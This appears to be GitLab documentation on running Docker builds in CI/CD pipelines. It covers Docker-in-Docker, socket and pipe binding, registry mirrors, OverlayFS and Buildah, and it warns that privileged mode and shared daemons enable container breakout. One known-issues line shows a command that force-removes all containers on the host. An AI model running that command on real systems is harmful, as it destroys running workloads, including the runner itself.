Add the `gitlab-runner` user to the `docker` group: ```shell sudo usermod -aG docker gitlab-runner ``` 1. Verify that `gitlab-runner` has access to Docker: ```shell sudo -u gitlab-runner -H docker info ``` 1. In GitLab, add `docker info` to `.gitlab-ci.yml` to verify that Docker is working: ```yaml default: before_script: - docker info build_image: script: - docker build -t my-docker-image . - docker run my-docker-image /script/to/run/tests ``` You can now use `docker` commands (and install Docker Compose if needed). When you add `gitlab-runner` to the `docker` group, you effectively grant `gitlab-runner` full root permissions. For more information, see [security of the `docker` group](https://blog.zopyx.com/on-docker-security-docker-group-considered-harmful/). ### Use Docker-in-Docker "Docker-in-Docker" (`dind`) means: - Your registered runner uses the [Docker executor](https://docs.gitlab.com/runner/executors/docker.html) or the [Kubernetes executor](https://docs.gitlab.com/runner/executors/kubernetes/). - The executor uses a [container image of Docker](https://hub.docker.com/_/docker/), provided by Docker, to run your CI/CD jobs. The Docker image includes all of the `docker` tools and can run the job script in context of the image in privileged mode. You should use Docker-in-Docker with TLS enabled, which is supported by [GitLab.com instance runners](../runners/_index.md). You should always pin a specific version of the image, like `docker:24.0.5`. If you use a tag like `docker:latest`, you have no control over which version is used. This can cause incompatibility problems when new versions are released. #### Use the Docker executor with Docker-in-Docker You can use the Docker executor to run jobs in a Docker container. ##### Docker-in-Docker with TLS enabled in the Docker executor The Docker daemon supports connections over TLS. TLS is the default in Docker 19.03.12 and later. 
{{< alert type="warning" >}} This task enables `--docker-privileged`, which effectively disables the container's security mechanisms and exposes your host to privilege escalation. This action can cause container breakout. For more information, see [runtime privilege and Linux capabilities](https://docs.docker.com/engine/reference/run/#runtime-privilege-and-linux-capabilities). {{< /alert >}} To use Docker-in-Docker with TLS enabled: 1. Install [GitLab Runner](https://docs.gitlab.com/runner/install/). 1. Register GitLab Runner from the command line. Use `docker` and `privileged` mode: ```shell sudo gitlab-runner register -n \ --url "https://gitlab.com/" \ --registration-token REGISTRATION_TOKEN \ --executor docker \ --description "My Docker Runner" \ --tag-list "tls-docker-runner" \ --docker-image "docker:24.0.5" \ --docker-privileged \ --docker-volumes "/certs/client" ``` - This command registers a new runner to use the `docker:24.0.5` image (if none is specified at the job level). To start the build and service containers, it uses the `privileged` mode. If you want to use Docker-in-Docker, you must always use `privileged = true` in your Docker containers. - This command mounts `/certs/client` for the service and build container, which is needed for the Docker client to use the certificates in that directory. For more information, see [the Docker image documentation](https://hub.docker.com/_/docker/). The previous command creates a `config.toml` entry similar to the following example: ```toml [[runners]] url = "https://gitlab.com/" token = TOKEN executor = "docker" [runners.docker] tls_verify = false image = "docker:24.0.5" privileged = true disable_cache = false volumes = ["/certs/client", "/cache"] [runners.cache] [runners.cache.s3] [runners.cache.gcs] ``` 1. You can now use `docker` in the job script. 
You should include the `docker:24.0.5-dind` service: ```yaml default: image: docker:24.0.5 services: - docker:24.0.5-dind before_script: - docker info variables: # When you use the dind service, you must instruct Docker to talk with # the daemon started inside of the service. The daemon is available # with a network connection instead of the default # /var/run/docker.sock socket. Docker 19.03 does this automatically # by setting the DOCKER_HOST in # https://github.com/docker-library/docker/blob/d45051476babc297257df490d22cbd806f1b11e4/19.03/docker-entrypoint.sh#L23-L29 # # The 'docker' hostname is the alias of the service container as described at # https://docs.gitlab.com/ee/ci/services/#accessing-the-services. # # Specify to Docker where to create the certificates. Docker # creates them automatically on boot, and creates # `/certs/client` to share between the service and job # container, thanks to volume mount from config.toml DOCKER_TLS_CERTDIR: "/certs" build: stage: build tags: - tls-docker-runner script: - docker build -t my-docker-image . - docker run my-docker-image /script/to/run/tests ``` ##### Use a Unix socket on a shared volume between Docker-in-Docker and build container Directories defined in `volumes = ["/certs/client", "/cache"]` in the [Docker-in-Docker with TLS enabled in the Docker executor](#docker-in-docker-with-tls-enabled-in-the-docker-executor) approach are [persistent between builds](https://docs.gitlab.com/runner/executors/docker.html#persistent-storage). If multiple CI/CD jobs using a Docker executor runner have Docker-in-Docker services enabled, then each job writes to the directory path. This approach might result in a conflict. To address this conflict, use a Unix socket on a volume shared between the Docker-in-Docker service and the build container. This approach improves performance and establishes a secure connection between the service and client. 
The following is a sample `config.toml` with temporary volume shared between build and service containers: ```toml [[runners]] url = "https://gitlab.com/" token = TOKEN executor = "docker" [runners.docker] image = "docker:24.0.5" privileged = true volumes = ["/runner/services/docker"] # Temporary volume shared between build and service containers. ``` The Docker-in-Docker service creates a `docker.sock`. The Docker client connects to `docker.sock` through a Docker Unix socket volume. ```yaml job: variables: # This variable is shared by both the DinD service and Docker client. # For the service, it will instruct DinD to create `docker.sock` here. # For the client, it tells the Docker client which Docker Unix socket to connect to. DOCKER_HOST: "unix:///runner/services/docker/docker.sock" services: - docker:24.0.5-dind image: docker:24.0.5 script: - docker version ``` ##### Docker-in-Docker with TLS disabled in the Docker executor Sometimes there are legitimate reasons to disable TLS. For example, you have no control over the GitLab Runner configuration that you are using. 1. Register GitLab Runner from command line. Use `docker` and `privileged` mode: ```shell sudo gitlab-runner register -n \ --url "https://gitlab.com/" \ --registration-token REGISTRATION_TOKEN \ --executor docker \ --description "My Docker Runner" \ --tag-list "no-tls-docker-runner" \ --docker-image "docker:24.0.5" \ --docker-privileged ``` The previous command creates a `config.toml` entry similar to the following example: ```toml [[runners]] url = "https://gitlab.com/" token = TOKEN executor = "docker" [runners.docker] tls_verify = false image = "docker:24.0.5" privileged = true disable_cache = false volumes = ["/cache"] [runners.cache] [runners.cache.s3] [runners.cache.gcs] ``` 1. 
Include the `docker:24.0.5-dind` service in the job script: ```yaml default: image: docker:24.0.5 services: - docker:24.0.5-dind before_script: - docker info variables: # When using dind service, you must instruct docker to talk with the # daemon started inside of the service. The daemon is available with # a network connection instead of the default /var/run/docker.sock socket. # # The 'docker' hostname is the alias of the service container as described at # https://docs.gitlab.com/ee/ci/docker/using_docker_images.html#accessing-the-services # DOCKER_HOST: tcp://docker:2375 # # This instructs Docker not to start over TLS. DOCKER_TLS_CERTDIR: "" build: stage: build tags: - no-tls-docker-runner script: - docker build -t my-docker-image . - docker run my-docker-image /script/to/run/tests ``` ##### Docker-in-Docker with proxy enabled in the Docker executor You might need to configure proxy settings to use the `docker push` command. For more information, see [Proxy settings when using dind service](https://docs.gitlab.com/runner/configuration/proxy.html#proxy-settings-when-using-dind-service). #### Use the Kubernetes executor with Docker-in-Docker You can use the [Kubernetes executor](https://docs.gitlab.com/runner/executors/kubernetes/) to run jobs in a Docker container. ##### Docker-in-Docker with TLS enabled in Kubernetes To use Docker-in-Docker with TLS enabled in Kubernetes: 1. Using the [Helm chart](https://docs.gitlab.com/runner/install/kubernetes.html), update the [`values.yml` file](https://gitlab.com/gitlab-org/charts/gitlab-runner/-/blob/00c1a2098f303dffb910714752e9a981e119f5b5/values.yaml#L133-137) to specify a volume mount. ```yaml runners: tags: "tls-dind-kubernetes-runner" config: | [[runners]] [runners.kubernetes] image = "ubuntu:20.04" privileged = true [[runners.kubernetes.volumes.empty_dir]] name = "docker-certs" mount_path = "/certs/client" medium = "Memory" ``` 1. 
Include the `docker:24.0.5-dind` service in the job: ```yaml default: image: docker:24.0.5 services: - name: docker:24.0.5-dind variables: HEALTHCHECK_TCP_PORT: "2376" before_script: - docker info variables: # When using dind service, you must instruct Docker to talk with # the daemon started inside of the service. The daemon is available # with a network connection instead of the default # /var/run/docker.sock socket. DOCKER_HOST: tcp://docker:2376 # # The 'docker' hostname is the alias of the service container as described at # https://docs.gitlab.com/ee/ci/services/#accessing-the-services. # # Specify to Docker where to create the certificates. Docker # creates them automatically on boot, and creates # `/certs/client` to share between the service and job # container, thanks to volume mount from config.toml DOCKER_TLS_CERTDIR: "/certs" # These are usually specified by the entrypoint, however the # Kubernetes executor doesn't run entrypoints # https://gitlab.com/gitlab-org/gitlab-runner/-/issues/4125 DOCKER_TLS_VERIFY: 1 DOCKER_CERT_PATH: "$DOCKER_TLS_CERTDIR/client" build: stage: build tags: - tls-dind-kubernetes-runner script: - docker build -t my-docker-image . - docker run my-docker-image /script/to/run/tests ``` ##### Docker-in-Docker with TLS disabled in Kubernetes To use Docker-in-Docker with TLS disabled in Kubernetes, you must adapt the previous example to: - Remove the `[[runners.kubernetes.volumes.empty_dir]]` section from the `values.yml` file. - Change the port from `2376` to `2375` with `DOCKER_HOST: tcp://docker:2375`. - Instruct Docker to start with TLS disabled with `DOCKER_TLS_CERTDIR: ""`. For example: 1. 
Using the [Helm chart](https://docs.gitlab.com/runner/install/kubernetes.html), update the [`values.yml` file](https://gitlab.com/gitlab-org/charts/gitlab-runner/-/blob/00c1a2098f303dffb910714752e9a981e119f5b5/values.yaml#L133-137): ```yaml runners: tags: "no-tls-dind-kubernetes-runner" config: | [[runners]] [runners.kubernetes] image = "ubuntu:20.04" privileged = true ``` 1. You can now use `docker` in the job script. You should include the `docker:24.0.5-dind` service: ```yaml default: image: docker:24.0.5 services: - name: docker:24.0.5-dind variables: HEALTHCHECK_TCP_PORT: "2375" before_script: - docker info variables: # When using dind service, you must instruct Docker to talk with # the daemon started inside of the service. The daemon is available # with a network connection instead of the default # /var/run/docker.sock socket. DOCKER_HOST: tcp://docker:2375 # # The 'docker' hostname is the alias of the service container as described at # https://docs.gitlab.com/ee/ci/services/#accessing-the-services. # # This instructs Docker not to start over TLS. DOCKER_TLS_CERTDIR: "" build: stage: build tags: - no-tls-dind-kubernetes-runner script: - docker build -t my-docker-image . - docker run my-docker-image /script/to/run/tests ``` #### Known issues with Docker-in-Docker Docker-in-Docker is the recommended configuration, but you should be aware of the following issues: - **The `docker-compose` command**: This command is not available in this configuration by default. To use `docker-compose` in your job scripts, follow the Docker Compose [installation instructions](https://docs.docker.com/compose/install/). - **Cache**: Each job runs in a new environment. Because every build gets its own instance of the Docker engine, concurrent jobs do not cause conflicts. However, jobs can be slower because there's no caching of layers. See [Docker layer caching](#make-docker-in-docker-builds-faster-with-docker-layer-caching). 
- **Storage drivers**: By default, earlier versions of Docker use the `vfs` storage driver, which copies the file system for each job. Docker 17.09 and later use `--storage-driver overlay2`, which is the recommended storage driver. See [Using the OverlayFS driver](#use-the-overlayfs-driver) for details. - **Root file system**: Because the `docker:24.0.5-dind` container and the runner container do not share their root file system, you can use the job's working directory as a mount point for child containers. For example, if you have files you want to share with a child container, you could create a subdirectory under `/builds/$CI_PROJECT_PATH` and use it as your mount point. For a more detailed explanation, see [issue #41227](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/41227). ```yaml variables: MOUNT_POINT: /builds/$CI_PROJECT_PATH/mnt script: - mkdir -p "$MOUNT_POINT" - docker run -v "$MOUNT_POINT:/mnt" my-docker-image ``` ### Use Docker socket binding To use Docker commands in your CI/CD jobs, you can bind-mount `/var/run/docker.sock` into the build container. Docker is then available in the context of the image. If you bind the Docker socket you can't use `docker:24.0.5-dind` as a service. Volume bindings also affect services, making them incompatible. #### Use the Docker executor with Docker socket binding To mount the Docker socket with the Docker executor, add `"/var/run/docker.sock:/var/run/docker.sock"` to the [Volumes in the `[runners.docker]` section](https://docs.gitlab.com/runner/configuration/advanced-configuration.html#volumes-in-the-runnersdocker-section). 1. 
To mount `/var/run/docker.sock` while registering your runner, include the following options:

```shell
sudo gitlab-runner register \
  --non-interactive \
  --url "https://gitlab.com/" \
  --registration-token REGISTRATION_TOKEN \
  --executor "docker" \
  --description "docker-runner" \
  --tag-list "socket-binding-docker-runner" \
  --docker-image "docker:24.0.5" \
  --docker-volumes "/var/run/docker.sock:/var/run/docker.sock"
```

The previous command creates a `config.toml` entry similar to the following example:

```toml
[[runners]]
  url = "https://gitlab.com/"
  token = "RUNNER_TOKEN"
  executor = "docker"
  [runners.docker]
    tls_verify = false
    image = "docker:24.0.5"
    privileged = false
    disable_cache = false
    volumes = ["/var/run/docker.sock:/var/run/docker.sock", "/cache"]
  [runners.cache]
    Insecure = false
```

1. Use Docker in the job script:

```yaml
default:
  image: docker:24.0.5

  before_script:
    - docker info

build:
  stage: build
  tags:
    - socket-binding-docker-runner
  script:
    - docker build -t my-docker-image .
    - docker run my-docker-image /script/to/run/tests
```

#### Use the Kubernetes executor with Docker socket binding

To mount the Docker socket with the Kubernetes executor, add `"/var/run/docker.sock"` to the [Volumes in the `[[runners.kubernetes.volumes.host_path]]` section](https://docs.gitlab.com/runner/executors/kubernetes/index.html#hostpath-volume).

1. To specify a volume mount, update the [`values.yml` file](https://gitlab.com/gitlab-org/charts/gitlab-runner/-/blob/00c1a2098f303dffb910714752e9a981e119f5b5/values.yaml#L133-137) by using the [Helm chart](https://docs.gitlab.com/runner/install/kubernetes.html):

```yaml
runners:
  tags: "socket-binding-kubernetes-runner"
  config: |
    [[runners]]
      [runners.kubernetes]
        image = "ubuntu:20.04"
        privileged = false
        [[runners.kubernetes.volumes.host_path]]
          host_path = '/var/run/docker.sock'
          mount_path = '/var/run/docker.sock'
          name = 'docker-sock'
          read_only = true
```

1. 
Use Docker in the job script: ```yaml default: image: docker:24.0.5 before_script: - docker info build: stage: build tags: - socket-binding-kubernetes-runner script: - docker build -t my-docker-image . - docker run my-docker-image /script/to/run/tests ``` #### Known issues with Docker socket binding When you use Docker socket binding, you avoid running Docker in privileged mode. However, the implications of this method are: - When you share the Docker daemon, you effectively disable the container's security mechanisms and expose your host to privilege escalation. This can cause container breakout. For example, if you run `docker rm -f $(docker ps -a -q)` in a project, it removes the GitLab Runner containers. - Concurrent jobs might not work. If your tests create containers with specific names, they might conflict with each other. - Any containers created by Docker commands are siblings of the runner, rather than children of the runner. This might cause complications for your workflow. - Sharing files and directories from the source repository into containers might not work as expected. Volume mounting is done in the context of the host machine, not the build container. For example: ```shell docker run --rm -t -i -v $(pwd)/src:/home/app/src test-image:latest run_app_tests ``` You do not need to include the `docker:24.0.5-dind` service, like you do when you use the Docker-in-Docker executor: ```yaml default: image: docker:24.0.5 before_script: - docker info build: stage: build script: - docker build -t my-docker-image . - docker run my-docker-image /script/to/run/tests ``` For complex Docker-in-Docker setups like [Code Quality scanning using CodeClimate](../testing/code_quality_codeclimate_scanning.md), you must match host and container paths for proper execution. For more details, see [Use private runners for CodeClimate-based scanning](../testing/code_quality_codeclimate_scanning.md#use-private-runners). 
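As noted in the known issues above, concurrent jobs can conflict when containers or images use fixed names, because they all share the host's Docker daemon. One mitigation is to namespace names with the predefined `CI_JOB_ID` variable. The job name and tag below are illustrative:

```yaml
# Sketch: namespace images and containers with $CI_JOB_ID so concurrent
# jobs that share the host Docker daemon do not collide on names.
build:
  stage: build
  tags:
    - socket-binding-docker-runner
  script:
    - docker build -t "my-docker-image:$CI_JOB_ID" .
    - docker run --rm --name "tests-$CI_JOB_ID" "my-docker-image:$CI_JOB_ID" /script/to/run/tests
```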
### Use Docker pipe binding

Windows containers run Windows executables compiled for the Windows Server kernel and userland (either `windowsservercore` or `nanoserver`). To build and run Windows containers, you need a Windows system with container support. For more information, see [Windows Containers](https://learn.microsoft.com/en-us/virtualization/windowscontainers/).

To use Docker pipe binding, you must install and run a Docker Engine on the host Windows Server operating system. For more information, see [Install Docker Community Edition (CE) on Windows Server](https://learn.microsoft.com/en-us/virtualization/windowscontainers/quick-start/set-up-environment?tabs=dockerce#windows-server-1).

To use Docker commands in your Windows-based container CI/CD jobs, you can bind-mount `\\.\pipe\docker_engine` into the launched executor container. Docker is then available in the context of the image.

Docker pipe binding in Windows is similar to [Docker socket binding in Linux](#use-docker-socket-binding), and has similar [known issues](#known-issues-with-docker-pipe-binding) to the [known issues with Docker socket binding](#known-issues-with-docker-socket-binding).

#### Use the Docker executor with Docker pipe binding

You can use the [Docker executor](https://docs.gitlab.com/runner/executors/docker.html) to run jobs in a Windows-based container.

To mount the Docker pipe with the Docker executor, add `"\\.\pipe\docker_engine:\\.\pipe\docker_engine"` to the [Volumes in the `[runners.docker]` section](https://docs.gitlab.com/runner/configuration/advanced-configuration.html#volumes-in-the-runnersdocker-section).

1. 
To mount `\\.\pipe\docker_engine` while registering your runner, include the following options:

```powershell
.\gitlab-runner.exe register `
  --non-interactive `
  --url "https://gitlab.com/" `
  --registration-token REGISTRATION_TOKEN `
  --executor "docker-windows" `
  --description "docker-windows-runner" `
  --tag-list "docker-windows-runner" `
  --docker-image "docker:25-windowsservercore-ltsc2022" `
  --docker-volumes "\\.\pipe\docker_engine:\\.\pipe\docker_engine"
```

The previous command creates a `config.toml` entry similar to the following example:

```toml
[[runners]]
  url = "https://gitlab.com/"
  token = "RUNNER_TOKEN"
  executor = "docker-windows"
  [runners.docker]
    tls_verify = false
    image = "docker:25-windowsservercore-ltsc2022"
    privileged = false
    disable_cache = false
    volumes = ['\\.\pipe\docker_engine:\\.\pipe\docker_engine']
  [runners.cache]
    Insecure = false
```

1. Use Docker in the job script:

```yaml
default:
  image: docker:25-windowsservercore-ltsc2022

  before_script:
    - docker version
    - docker info

build:
  stage: build
  tags:
    - docker-windows-runner
  script:
    - docker build -t my-docker-image .
    - docker run my-docker-image /script/to/run/tests
```

#### Use the Kubernetes executor with Docker pipe binding

You can use the [Kubernetes executor](https://docs.gitlab.com/runner/executors/kubernetes.html) to run jobs in a Windows-based container. To use the Kubernetes executor for Windows-based containers, you must include Windows nodes in your Kubernetes cluster. For more information, see [Windows containers in Kubernetes](https://kubernetes.io/docs/concepts/windows/intro/). You can use a [runner operating in a Linux environment but targeting Windows nodes](https://docs.gitlab.com/runner/executors/kubernetes/#example-for-windowsamd64).

To mount the Docker pipe with the Kubernetes executor, add `"\\.\pipe\docker_engine"` to the [Volumes in the `[[runners.kubernetes.volumes.host_path]]` section](https://docs.gitlab.com/runner/executors/kubernetes/index.html#hostpath-volume).

1. 
To specify a volume mount, update the [`values.yml` file](https://gitlab.com/gitlab-org/charts/gitlab-runner/-/blob/00c1a2098f303dffb910714752e9a981e119f5b5/values.yaml#L133-137) by using the [Helm chart](https://docs.gitlab.com/runner/install/kubernetes.html):

```yaml
runners:
  tags: "kubernetes-windows-runner"
  config: |
    [[runners]]
      executor = "kubernetes"

      # The FF_USE_POWERSHELL_PATH_RESOLVER feature flag has to be enabled for PowerShell
      # to resolve paths for Windows correctly when Runner is operating in a Linux environment
      # but targeting Windows nodes.
      [runners.feature_flags]
        FF_USE_POWERSHELL_PATH_RESOLVER = true

      [runners.kubernetes]
        [[runners.kubernetes.volumes.host_path]]
          host_path = '\\.\pipe\docker_engine'
          mount_path = '\\.\pipe\docker_engine'
          name = 'docker-pipe'
          read_only = true
        [runners.kubernetes.node_selector]
          "kubernetes.io/arch" = "amd64"
          "kubernetes.io/os" = "windows"
          "node.kubernetes.io/windows-build" = "10.0.20348"
```

1. Use Docker in the job script:

```yaml
default:
  image: docker:25-windowsservercore-ltsc2022

  before_script:
    - docker version
    - docker info

build:
  stage: build
  tags:
    - kubernetes-windows-runner
  script:
    - docker build -t my-docker-image .
    - docker run my-docker-image /script/to/run/tests
```

##### Known issues with AWS EKS Kubernetes cluster

When you migrate from `dockerd` to `containerd`, the AWS EKS bootstrapping script `Start-EKSBootstrap.ps1` stops and disables the Docker Service.
To work around this issue, rename the Docker Service after you [Install Docker Community Edition (CE) on Windows Server](https://learn.microsoft.com/en-us/virtualization/windowscontainers/quick-start/set-up-environment?tabs=dockerce#windows-server-1) with this script: ```powershell Write-Output "Rename the just installed Docker Engine Service from docker to dockerd" Write-Output "because the Start-EKSBootstrap.ps1 stops and disables the docker Service as part of migration from dockerd to containerd" Stop-Service -Name docker dockerd --register-service --service-name dockerd Start-Service -Name dockerd Write-Output "Ready to do Docker pipe binding on Windows EKS Node! :-)" ``` #### Known issues with Docker pipe binding Docker pipe binding has the same set of security and isolation issues as the [Known issues with Docker socket binding](#known-issues-with-docker-socket-binding). ## Enable registry mirror for `docker:dind` service When the Docker daemon starts inside the service container, it uses the default configuration. You might want to configure a [registry mirror](https://docs.docker.com/docker-hub/mirror/) for performance improvements and to ensure you do not exceed Docker Hub rate limits. ### The service in the `.gitlab-ci.yml` file You can append extra CLI flags to the `dind` service to set the registry mirror: ```yaml services: - name: docker:24.0.5-dind command: ["--registry-mirror", "https://registry-mirror.example.com"] # Specify the registry mirror to use ``` ### The service in the GitLab Runner configuration file If you are a GitLab Runner administrator, you can specify the `command` to configure the registry mirror for the Docker daemon. The `dind` service must be defined for the [Docker](https://docs.gitlab.com/runner/configuration/advanced-configuration.html#the-runnersdockerservices-section) or [Kubernetes executor](https://docs.gitlab.com/runner/executors/kubernetes/#define-a-list-of-services). Docker: ```toml [[runners]] ... 
executor = "docker" [runners.docker] ... privileged = true [[runners.docker.services]] name = "docker:24.0.5-dind" command = ["--registry-mirror", "https://registry-mirror.example.com"] ``` Kubernetes: ```toml [[runners]] ... name = "kubernetes" [runners.kubernetes] ... privileged = true [[runners.kubernetes.services]] name = "docker:24.0.5-dind" command = ["--registry-mirror", "https://registry-mirror.example.com"] ``` ### The Docker executor in the GitLab Runner configuration file If you are a GitLab Runner administrator, you can use the mirror for every `dind` service. Update the [configuration](https://docs.gitlab.com/runner/configuration/advanced-configuration.html) to specify a [volume mount](https://docs.gitlab.com/runner/configuration/advanced-configuration.html#volumes-in-the-runnersdocker-section). For example, if you have a `/opt/docker/daemon.json` file with the following content: ```json { "registry-mirrors": [ "https://registry-mirror.example.com" ] } ``` Update the `config.toml` file to mount the file to `/etc/docker/daemon.json`. This mounts the file for **every** container created by GitLab Runner. The configuration is detected by the `dind` service. ```toml [[runners]] ... executor = "docker" [runners.docker] image = "alpine:3.12" privileged = true volumes = ["/opt/docker/daemon.json:/etc/docker/daemon.json:ro"] ``` ### The Kubernetes executor in the GitLab Runner configuration file If you are a GitLab Runner administrator, you can use the mirror for every `dind` service. Update the [configuration](https://docs.gitlab.com/runner/configuration/advanced-configuration.html) to specify a [ConfigMap volume mount](https://docs.gitlab.com/runner/executors/kubernetes/#configmap-volume). For example, if you have a `/tmp/daemon.json` file with the following content: ```json { "registry-mirrors": [ "https://registry-mirror.example.com" ] } ``` Create a [ConfigMap](https://kubernetes.io/docs/concepts/configuration/configmap/) with the content of this file. 
You can do this with a command like: ```shell kubectl create configmap docker-daemon --namespace gitlab-runner --from-file /tmp/daemon.json ``` {{< alert type="note" >}} You must use the namespace that the Kubernetes executor for GitLab Runner uses to create job pods. {{< /alert >}} After the ConfigMap is created, you can update the `config.toml` file to mount the file to `/etc/docker/daemon.json`. This update mounts the file for **every** container created by GitLab Runner. The `dind` service detects this configuration. ```toml [[runners]] ... executor = "kubernetes" [runners.kubernetes] image = "alpine:3.12" privileged = true [[runners.kubernetes.volumes.config_map]] name = "docker-daemon" mount_path = "/etc/docker/daemon.json" sub_path = "daemon.json" ``` ## Authenticate with registry in Docker-in-Docker When you use Docker-in-Docker, the [standard authentication methods](using_docker_images.md#access-an-image-from-a-private-container-registry) do not work, because a fresh Docker daemon is started with the service. You should [authenticate with registry](authenticate_registry.md). ## Make Docker-in-Docker builds faster with Docker layer caching When using Docker-in-Docker, Docker downloads all layers of your image every time you create a build. You can [make your builds faster with Docker layer caching](docker_layer_caching.md). ## Use the OverlayFS driver {{< alert type="note" >}} The instance runners on GitLab.com use the `overlay2` driver by default. {{< /alert >}} By default, when using `docker:dind`, Docker uses the `vfs` storage driver, which copies the file system on every run. You can avoid this disk-intensive operation by using a different driver, for example `overlay2`. ### Requirements 1. Ensure a recent kernel is used, preferably `>= 4.2`. 1. Check whether the `overlay` module is loaded: ```shell sudo lsmod | grep overlay ``` If you see no result, then the module is not loaded. 
To load the module, use:

```shell
sudo modprobe overlay
```

If you had to load the module manually, make sure it also loads on reboot. On Ubuntu systems, do this by adding the following line to `/etc/modules`:

```plaintext
overlay
```

### Use the OverlayFS driver per project

You can enable the driver for each project individually by using the `DOCKER_DRIVER` [CI/CD variable](../yaml/_index.md#variables) in `.gitlab-ci.yml`:

```yaml
variables:
  DOCKER_DRIVER: overlay2
```

### Use the OverlayFS driver for every project

If you use your own [runners](https://docs.gitlab.com/runner/), you can enable the driver for every project by setting the `DOCKER_DRIVER` environment variable in the [`[[runners]]` section of the `config.toml` file](https://docs.gitlab.com/runner/configuration/advanced-configuration.html#the-runners-section):

```toml
environment = ["DOCKER_DRIVER=overlay2"]
```

If you're running multiple runners, you must modify all configuration files.

Read more about the [runner configuration](https://docs.gitlab.com/runner/configuration/) and [using the OverlayFS storage driver](https://docs.docker.com/storage/storagedriver/overlayfs-driver/).

## Docker alternatives

You can build container images without enabling privileged mode on your runner:

- [BuildKit](using_buildkit.md): Includes rootless BuildKit options that eliminate Docker daemon dependency.
- [Buildah](#buildah-example): Build OCI-compliant images without requiring a Docker daemon.

### Buildah example

To use Buildah with GitLab CI/CD, you need [a runner](https://docs.gitlab.com/runner/) with one of the following executors:

- [Kubernetes](https://docs.gitlab.com/runner/executors/kubernetes/).
- [Docker](https://docs.gitlab.com/runner/executors/docker.html).
- [Docker Machine](https://docs.gitlab.com/runner/executors/docker_machine.html).

In this example, you use Buildah to:

1. Build a Docker image.
1. Push it to the [GitLab container registry](../../user/packages/container_registry/_index.md).
In the last step, Buildah uses the `Dockerfile` under the root directory of the project to build the Docker image. Finally, it pushes the image to the project's container registry: ```yaml build: stage: build image: quay.io/buildah/stable variables: # Use vfs with buildah. Docker offers overlayfs as a default, but Buildah # cannot stack overlayfs on top of another overlayfs filesystem. STORAGE_DRIVER: vfs # Write all image metadata in the docker format, not the standard OCI format. # Newer versions of docker can handle the OCI format, but older versions, like # the one shipped with Fedora 30, cannot handle the format. BUILDAH_FORMAT: docker FQ_IMAGE_NAME: "$CI_REGISTRY_IMAGE/test" before_script: # GitLab container registry credentials taken from the # [predefined CI/CD variables](../variables/_index.md#predefined-cicd-variables) # to authenticate to the registry. - echo "$CI_REGISTRY_PASSWORD" | buildah login -u "$CI_REGISTRY_USER" --password-stdin $CI_REGISTRY script: - buildah images - buildah build -t $FQ_IMAGE_NAME - buildah images - buildah push $FQ_IMAGE_NAME ``` If you are using GitLab Runner Operator deployed to an OpenShift cluster, try the [tutorial for using Buildah to build images in rootless container](buildah_rootless_tutorial.md). ## Use the GitLab container registry After you've built a Docker image, you can push it to the [GitLab container registry](../../user/packages/container_registry/build_and_push_images.md#use-gitlab-cicd). 
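The pieces above can be combined into a minimal Docker-in-Docker job that builds an image and pushes it to the project's registry. This sketch assumes a privileged runner with the TLS-enabled `dind` configuration shown earlier in this page; `CI_REGISTRY`, `CI_REGISTRY_USER`, `CI_REGISTRY_PASSWORD`, `CI_REGISTRY_IMAGE`, and `CI_COMMIT_SHORT_SHA` are predefined CI/CD variables:

```yaml
# Sketch: build and push to the project's container registry from a dind job.
# Assumes a privileged runner with the TLS dind setup described above.
publish:
  stage: build
  image: docker:24.0.5
  services:
    - docker:24.0.5-dind
  variables:
    DOCKER_HOST: tcp://docker:2376
    DOCKER_TLS_CERTDIR: "/certs"
    DOCKER_TLS_VERIFY: 1
    DOCKER_CERT_PATH: "$DOCKER_TLS_CERTDIR/client"
  before_script:
    # CI_REGISTRY_USER and CI_REGISTRY_PASSWORD are predefined by GitLab.
    - echo "$CI_REGISTRY_PASSWORD" | docker login -u "$CI_REGISTRY_USER" --password-stdin "$CI_REGISTRY"
  script:
    - docker build -t "$CI_REGISTRY_IMAGE:$CI_COMMIT_SHORT_SHA" .
    - docker push "$CI_REGISTRY_IMAGE:$CI_COMMIT_SHORT_SHA"
```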
## Troubleshooting

### `open //./pipe/docker_engine: The system cannot find the file specified`

The following error might appear when you run a `docker` command in the PowerShell script to access the mounted Docker pipe:

```powershell
PS C:\> docker version
Client:
 Version:           25.0.5
 API version:       1.44
 Go version:        go1.21.8
 Git commit:        5dc9bcc
 Built:             Tue Mar 19 15:06:12 2024
 OS/Arch:           windows/amd64
 Context:           default
error during connect: this error may indicate that the docker daemon is not running: Get "http://%2F%2F.%2Fpipe%2Fdocker_engine/v1.44/version": open //./pipe/docker_engine: The system cannot find the file specified.
```

The error indicates that the Docker Engine is not running on the Windows EKS node, so the Docker pipe binding cannot be used in the Windows-based executor container. To solve the problem, use the workaround described in [Use the Kubernetes executor with Docker pipe binding](#use-the-kubernetes-executor-with-docker-pipe-binding).
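Before applying the workaround, you can check whether the Docker named pipe is actually present on the node. This is an illustrative diagnostic step, not part of the official documentation:

```powershell
# Sketch: returns True only when the Docker Engine named pipe exists,
# that is, when a Docker daemon is running on this Windows node.
Test-Path \\.\pipe\docker_engine
```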
# Troubleshooting Docker Build
## Error: `docker: Cannot connect to the Docker daemon at tcp://docker:2375` This error is common when you are using [Docker-in-Docker](using_docker_build.md#use-docker-in-docker) v19.03 or later: ```plaintext docker: Cannot connect to the Docker daemon at tcp://docker:2375. Is the docker daemon running? ``` This error occurs because Docker starts on TLS automatically. - If this is your first time setting it up, see [use the Docker executor with the Docker image](using_docker_build.md#use-docker-in-docker). - If you are upgrading from v18.09 or earlier, see the [upgrade guide](https://about.gitlab.com/blog/2019/07/31/docker-in-docker-with-docker-19-dot-03/). This error can also occur with the [Kubernetes executor](https://docs.gitlab.com/runner/executors/kubernetes/#using-dockerdind) when attempts are made to access the Docker-in-Docker service before it has fully started up. For a more detailed explanation, see [issue 27215](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/27215). ## Docker `no such host` error You might get an error that says `docker: error during connect: Post https://docker:2376/v1.40/containers/create: dial tcp: lookup docker on x.x.x.x:53: no such host`. This issue can occur when the service's image name [includes a registry hostname](../services/_index.md#available-settings-for-services). For example: ```yaml default: image: docker:24.0.5 services: - registry.hub.docker.com/library/docker:24.0.5-dind ``` A service's hostname is [derived from the full image name](../services/_index.md#accessing-the-services). However, the shorter service hostname `docker` is expected. 
